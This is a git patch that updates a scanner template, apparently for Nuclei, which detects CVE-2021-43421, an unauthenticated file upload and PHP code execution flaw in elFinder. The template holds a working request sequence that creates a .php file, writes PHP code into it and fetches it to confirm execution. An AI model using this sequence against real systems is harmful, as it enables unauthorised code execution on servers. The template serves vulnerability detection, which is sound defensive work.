From f1c9b9802d83f7a2bae0593e7b314572bdf1d641 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 24 Nov 2022 11:09:24 +0530
Subject: [PATCH] Update CVE-2021-43421.yaml

---
 cves/2021/CVE-2021-43421.yaml | 43 ++++++++++++++++++-----------------
 1 file changed, 22 insertions(+), 21 deletions(-)

diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml
index 9d69233ed8..d996c5ac96 100644
--- a/cves/2021/CVE-2021-43421.yaml
+++ b/cves/2021/CVE-2021-43421.yaml
@@ -1,49 +1,50 @@
 id: CVE-2021-43421
 
 info:
-  name: Studio-42 elFinder RCE <2.1.60
+  name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload 
   author: akincibor
   severity: critical
-  description: A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
+  description: |
+    A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
   reference:
     - https://github.com/Studio-42/elFinder/issues/3429
     - https://nvd.nist.gov/vuln/detail/CVE-2021-43421
-  tags: cve,cve2021,rce,unauth,elfinder
+  tags: cve,cve2021,elfinder,unauth,upload,rce
 
 requests:
   - raw:
       - |
-        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa HTTP/1.1
+        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
         Host: {{Hostname}}
         Accept: */*
 
       - |
-        POST /2/elFinder/php/connector.minimal.php HTTP/1.1
+        GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e HTTP/1.1
         Host: {{Hostname}}
-        Accept: application/json, text/javascript, /; q=0.01
-        Accept-Language: en-US,en;q=0.5
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
 
       - |
-        GET /2/elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1
+        GET /elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1
         Host: {{Hostname}}
         Accept: */*
 
-    extractors:
-      - type: regex
-        name: hash
-        internal: true
-        group: 1
-        regex:
-          - '"hash"\:"(.*?)"\,'
-
+      - |
+        GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
 
     req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_3, "{{randstr_1}}")'
-          - "status_code_3 == 200"
+          - 'contains(body_3, "{{randstr}}")'
+          - 'contains(body_4, "{{randstr_1}}")'
+          - "status_code == 200"
         condition: and
+
+    extractors:
+      - type: regex
+        name: hash
+        group: 1
+        regex:
+          - '"hash"\:"(.*?)"\,'
+        internal: true